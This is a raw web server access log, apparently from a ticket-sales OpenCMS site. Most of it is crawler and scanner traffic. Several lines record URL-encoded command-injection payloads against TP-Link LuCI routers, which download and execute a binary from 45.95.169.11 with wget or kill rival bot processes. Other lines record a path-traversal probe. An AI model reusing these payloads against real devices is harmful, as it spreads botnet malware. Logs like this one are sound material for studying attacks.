[03/Jul/2024:11:43:36 +0200] "CONNECT example.com:443 HTTP/1.1" 400 - 77.90.7.116 - - [03/Jul/2024:11:43:36 +0200] "GET / HTTP/1.1" 404 - 77.90.7.116 - - [03/Jul/2024:11:43:36 +0200] "CONNECT example.com:443 HTTP/1.1" 400 - 104.199.31.214 - - [03/Jul/2024:11:57:25 +0200] "GET / HTTP/1.1" 404 - 149.50.103.48 - - [03/Jul/2024:12:05:01 +0200] "GET / HTTP/1.1" 404 - 87.121.69.27 - - [03/Jul/2024:12:05:56 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 45.156.128.39 - - [03/Jul/2024:12:08:34 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 18.202.230.187 - - [03/Jul/2024:12:32:20 +0200] "GET /ticket2/opencms/ HTTP/1.0" 302 - 66.249.66.161 - - [03/Jul/2024:12:58:50 +0200] "GET /ticket2/opencms/en/venue/?venueid=AAC9A474-6F1C-8E49-0F79-0EFC179B3230 HTTP/1.1" 200 63654 66.249.66.162 - - [03/Jul/2024:12:58:50 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/ligue_1/paris_saint_germain/ HTTP/1.1" 200 70448 45.128.232.200 - - [03/Jul/2024:13:10:47 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 - 66.249.66.162 - - [03/Jul/2024:13:32:49 +0200] "GET /ticket2/opencms/en/venue/?venueid=84B906DE-B460-D444-68C7-D7444F9F1F9B HTTP/1.1" 200 63651 77.90.7.116 - - [03/Jul/2024:13:33:53 +0200] "GET / HTTP/1.1" 404 - 77.90.7.116 - - [03/Jul/2024:13:33:54 +0200] "CONNECT example.com:443 HTTP/1.1" 400 - 77.90.7.116 - - [03/Jul/2024:13:33:54 +0200] "GET / HTTP/1.1" 404 - 77.90.7.116 - - [03/Jul/2024:13:33:54 +0200] "CONNECT example.com:443 HTTP/1.1" 400 - 66.249.66.161 - - [03/Jul/2024:13:34:00 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923 66.249.66.161 - - [03/Jul/2024:13:34:00 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39340 66.249.66.161 - - [03/Jul/2024:13:34:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/common-ajax.js HTTP/1.1" 200 20175 87.236.176.19 - - [03/Jul/2024:13:42:46 +0200] "GET / HTTP/1.1" 404 - 149.50.103.48 - - [03/Jul/2024:14:04:45 +0200] "GET / HTTP/1.1" 404 - 162.216.149.48 - - [03/Jul/2024:14:20:22 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 162.216.149.48 - - [03/Jul/2024:14:20:23 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 78.108.177.54 - - [03/Jul/2024:14:29:24 +0200] "GET / HTTP/1.0" 404 - 103.203.59.1 - - [03/Jul/2024:14:29:28 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 167.94.146.62 - - [03/Jul/2024:14:34:38 +0200] "GET / HTTP/1.1" 404 - 167.94.146.62 - - [03/Jul/2024:14:34:47 +0200] "GET / HTTP/1.1" 404 - 167.94.146.62 - - [03/Jul/2024:14:34:47 +0200] "PRI * HTTP/2.0" 505 - 87.121.69.27 - - [03/Jul/2024:14:35:35 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 206.168.34.59 - - [03/Jul/2024:15:03:21 +0200] "GET / HTTP/1.1" 404 - 206.168.34.59 - - [03/Jul/2024:15:03:30 +0200] "GET / HTTP/1.1" 404 - 206.168.34.59 - - [03/Jul/2024:15:03:30 +0200] "PRI * HTTP/2.0" 505 - 149.50.103.48 - - [03/Jul/2024:15:07:21 +0200] "GET / HTTP/1.1" 404 - 0.0.0.0 - - [03/Jul/2024:15:16:25 +0200] "HEAD null HTTP/1.1" 500 - 62.204.41.84 - - [03/Jul/2024:15:31:25 +0200] "GET /ticket2/opencms/RDWeb/Pages/ HTTP/1.1" 404 - 40.77.167.54 - - [03/Jul/2024:15:53:55 +0200] "GET /ticket2/opencms/en/venue/?venueid=167BF5C0-6635-8C74-B6D3-DD0AC3DE5519 HTTP/1.1" 200 63672 20.236.249.48 - - [03/Jul/2024:15:56:24 +0200] "GET /ticket2/opencms/owa/auth/logon.aspx HTTP/1.1" 404 - 52.189.75.230 - - [03/Jul/2024:16:04:32 +0200] "GET /ticket2/opencms/login HTTP/1.1" 404 - 167.94.145.102 - - [03/Jul/2024:16:16:40 +0200] "GET / HTTP/1.1" 404 - 167.94.145.102 - - [03/Jul/2024:16:16:49 +0200] "GET / HTTP/1.1" 404 - 167.94.145.102 - - [03/Jul/2024:16:16:49 +0200] "PRI * HTTP/2.0" 505 - 104.168.70.165 - - [03/Jul/2024:16:22:52 +0200] "GET / HTTP/1.1" 404 - 83.147.52.49 - - [03/Jul/2024:16:33:24 +0200] "GET /ticket2/opencms/default/en_US/frame.html?content=/dev/mtdblock/5 HTTP/1.1" 404 - 52.167.144.226 - - [03/Jul/2024:16:49:27 +0200] "GET /ticket2/opencms/en/venue/?countryid=E6D1D9A5-7003-75BD-6D2C-CB60A7D92969 HTTP/1.1" 200 93013 141.98.11.15 - - [03/Jul/2024:16:55:03 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 87.121.69.27 - - [03/Jul/2024:17:08:26 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 45.148.10.174 - - [03/Jul/2024:17:14:40 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 45.148.10.174 - - [03/Jul/2024:17:14:40 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 52.76.71.100 - - [03/Jul/2024:17:21:44 +0200] "GET /favicon.ico HTTP/1.1" 404 - 52.76.71.100 - - [03/Jul/2024:17:26:28 +0200] "GET /favicon.ico HTTP/1.1" 404 - 83.97.73.245 - - [03/Jul/2024:17:29:09 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 - 83.97.73.245 - - [03/Jul/2024:17:48:49 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 - 51.138.184.110 - - [03/Jul/2024:17:49:16 +0200] "GET / HTTP/1.1" 404 - 40.77.167.181 - - [03/Jul/2024:18:00:12 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773 40.77.167.181 - - [03/Jul/2024:18:00:12 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773 52.167.144.137 - - [03/Jul/2024:18:00:21 +0200] "GET /ticket2/opencms/en/buy/?comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=9457695E-36ED-A63E-7A88-32963954E2C7 HTTP/1.1" 200 68941 87.121.69.27 - - [03/Jul/2024:18:04:40 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 77.90.7.116 - - [03/Jul/2024:18:05:20 +0200] "GET / HTTP/1.1" 404 - 77.90.7.116 - - [03/Jul/2024:18:05:20 +0200] "CONNECT example.com:443 HTTP/1.1" 400 - 77.90.7.116 - - [03/Jul/2024:18:05:20 +0200] "GET / HTTP/1.1" 404 - 77.90.7.116 - - [03/Jul/2024:18:05:20 +0200] "CONNECT example.com:443 HTTP/1.1" 400 - 52.183.224.55 - - [03/Jul/2024:18:10:20 +0200] "GET /ticket2/opencms/version HTTP/1.1" 404 - 66.249.66.162 - - [03/Jul/2024:18:33:07 +0200] "GET /ticket2/opencms/en/venue/?countryid=A4DD8A66-89A9-9256-5B01-F5C6EA7FFD86 HTTP/1.1" 200 93700 195.246.120.122 - - [03/Jul/2024:18:51:52 +0200] "GET / HTTP/1.0" 404 - 52.76.71.100 - - [03/Jul/2024:18:53:08 +0200] "GET /favicon.ico HTTP/1.1" 404 - 51.138.188.120 - - [03/Jul/2024:19:01:40 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 51.138.188.120 - - [03/Jul/2024:19:01:40 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 114.119.146.98 - - [03/Jul/2024:19:05:34 +0200] "GET /ticket2/opencms/en/selling_tickets/ HTTP/1.1" 200 64298 77.90.7.116 - - [03/Jul/2024:19:20:17 +0200] "GET / HTTP/1.1" 404 - 77.90.7.116 - - [03/Jul/2024:19:20:17 +0200] "CONNECT example.com:443 HTTP/1.1" 400 - 77.90.7.116 - - [03/Jul/2024:19:20:17 +0200] "GET / HTTP/1.1" 404 - 77.90.7.116 - - [03/Jul/2024:19:20:17 +0200] "CONNECT example.com:443 HTTP/1.1" 400 - 52.167.144.179 - - [03/Jul/2024:19:45:26 +0200] "GET /ticket2/opencms/en/venue/?countryid=2193F5F2-8798-B3BE-FB16-3B568A67DED7 HTTP/1.1" 200 93013 47.251.88.40 - - [03/Jul/2024:19:48:47 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 35.202.9.133 - - [03/Jul/2024:19:49:46 +0200] "GET / HTTP/1.1" 404 - 195.135.66.203 - - [03/Jul/2024:20:07:37 +0200] "GET / HTTP/1.0" 404 - 45.148.10.174 - - [03/Jul/2024:20:26:05 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 45.148.10.174 - - [03/Jul/2024:20:26:05 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 198.235.24.108 - - [03/Jul/2024:21:14:42 +0200] "???E??E????X??+/tmp/index1.php HTTP/1.1" 404 - 103.39.93.93 - - [03/Jul/2024:23:19:59 +0200] "GET /ticket2/opencms/index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 404 - 87.121.69.27 - - [03/Jul/2024:23:26:15 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 45.148.10.174 - - [03/Jul/2024:23:31:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 45.148.10.174 - - [03/Jul/2024:23:31:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 52.167.144.184 - - [03/Jul/2024:23:47:56 +0200] "GET /ticket2/opencms/en/venue/?venueid=D9D29041-8F09-AC24-29B9-BAE0DD9106BB HTTP/1.1" 200 63658